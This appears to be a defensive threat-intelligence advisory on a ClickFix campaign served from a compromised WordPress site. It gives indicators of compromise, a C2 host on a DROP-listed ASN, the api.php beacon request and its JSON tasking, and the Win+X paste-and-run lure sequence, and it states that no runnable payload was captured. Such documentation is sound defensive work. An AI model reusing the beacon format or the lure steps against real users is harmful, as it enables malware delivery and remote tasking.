A third compromised-WordPress lure (gogreenlightloans[.]com) was captured delivering the
WP-002 ClickFix chain. Two structural shifts stand out: EtherHiding migrated from BSC-testnet to
Polygon, and the C2 has moved off Cloudflare-fronted stagers onto a domain that resolves
directly to the operator's own AS202412 (Spamhaus DROP-listed) IP
178.16.52.101 — the first time this campaign's live C2 is hosted directly on the
offender ASN.
In the captured session the Polygon retrieval failed (RPC returned a maintenance page) and only a non-command numeric string reached the clipboard — no runnable payload. This is degraded delivery, consistent with sustained takedown/blocklist pressure eroding the actor's fronting options and pushing them onto DROP-listed self-hosting.
GoDaddy WordPress (bankio-core theme + Elementor); Cloudflare 104.21.1.64 / origin 160.153.0.8. Victim — splitcam: never blocklisted.
polygon-bor-rpc.publicnode.com (migrated from BSC-testnet). The eth_call returned an error/maintenance page — the on-chain command source did not resolve.
Resolves directly to 178.16.52.101 — Omegatech AS202412, Spamhaus DROP. No Cloudflare fronting. Serves the arming stage and the api.php beacon.
base64-JSON {action:"dl", k:<campaign>, os:"windows", vid:<uuid>, ref:<lure>, ray:<cf>}. ?s=<k>&_v config, ?k=<k>&d=<b64> tasking, POST /api.php loop.
658 KB obfuscated JS (sha256 51d4def8…) performs the clipboard write. With the on-chain command source failed, it copied a fallback numeric string, not a command.
Shared Variant-B social engineering: Win+X → I → Ctrl+V → Enter (elevated).
asseload, cfsubs, helauth) were published to AbuseIPDB/OTX and are degraded. In v17 the actor has fallen back to self-hosting on their own ASN.178.16.52.0/24, or the whole DROP ASN) severs the v17 C2 — no Cloudflare shared-IP collateral to worry about.The captured session was engaged as a real target — the server returned action:"dl"
with a genuine victim UUID and shipped the full 658 KB arming payload, the opposite of a TDS
serving an analyst a benign decoy. The missing command is a source failure, not a decoy: this
family sources the final clipboard command on-chain (EtherHiding), and the Polygon leg failed, so the
arming JS copied a fallback numeric string. Classification of that exact string (decoy vs. encoded
vs. garbage) is pending a paste of the clipboard contents; it is not reproduced here.
| Type | Value | Role | Handling |
|---|---|---|---|
| domain | entry-verifed-cdn[.]codes | self-hosted api.php C2 | block |
| ipv4 | 178.16.52.101 (AS202412) | C2 host (Spamhaus DROP) | block |
| cidr | 178.16.52.0/24 / AS202412 | operator ASN now hosting C2 | block CIDR/ASN |
| campaign-key | a3946e3ded820e3d2f02885bf63c8a3a176d58bb9403b402 | api.php k=/s= | alert |
| domain | polygon-bor-rpc.publicnode.com | EtherHiding RPC (abused-legit) | correlate |
| sha256 | 51d4def852645a4f7a436abe7aa4498d08f57395e2f40e3c17cdb3f95d03f2d2 | arming stage JS (658 KB) | detect |
| url | hxxps://gogreenlightloans[.]com/ | compromised lure #3 | VICTIM — notify, do not block |
Shipped with this advisory: YARA (…V17.yar, 4 rules), Sigma (…V17.sigma.yml, 6 rules), STIX 2.1 (…V17.stix.json, 34 objects). Highest-value discriminator — the encoded beacon to DROP-listed infra:
GET /api.php?k=a3946e3ded820e3d2f02885bf63c8a3a176d58bb9403b402&d=<base64-json>
Host: entry-verifed-cdn.codes --> resolves 178.16.52.101 (AS202412, Spamhaus DROP)
beacon JSON: {"action":"dl","k":"a3946...","os":"windows","vid":"<uuid>","ref":"https://gogreenlightloans.com/"}
| Priority | Action |
|---|---|
| now | Block entry-verifed-cdn[.]codes and 178.16.52.0/24; if feasible, null-route the whole AS202412 (already Spamhaus DROP). |
| now | Alert on /api.php with the campaign key or base64-JSON {"action":"dl"…} beacon. |
| soon | Hunt elevated Win+X PowerShell download cradles; alert on injected ClickFix DOM (id="clipboard-text"+checkbox-container). |
| coord | Notify gogreenlightloans.com owner (compromised GoDaddy WP — bankio-core/Elementor). |
Attribution: infrastructure-level only. Splitcam: compromised lure/victim hosts are never blocklisted. Provenance: chain reconstructed from an embedded-keylog pcapng via independent TLS decryption by Dispensight/SecureLeaf — Polygon EtherHiding, the api.php C2, and the direct AS202412 hosting all verified on the wire. The final clipboard command was not extracted; its on-chain source failed in the captured session.
SL-ADV-2026-WP-001 v17 · TLP:CLEAR · Dispensight / SecureLeaf · secureleaf.dispensight.com